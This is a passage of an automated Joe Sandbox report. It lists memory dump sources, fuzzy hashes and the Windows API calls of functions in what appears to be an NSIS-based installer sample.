                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                        APIs
                                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 3394109436-0
                                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                        APIs
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                        • String ID:
                                                                                        • API String ID: 4115351271-0
                                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                                        • API String ID: 2110491804-2409696222
                                                                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $ @$M$N
                                                                                        • API String ID: 1638840714-3479655940
                                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                        • String ID: 82D$@%F$@rD$A
                                                                                        • API String ID: 3347642858-1086125096
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                        • API String ID: 1916479912-1189179171
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
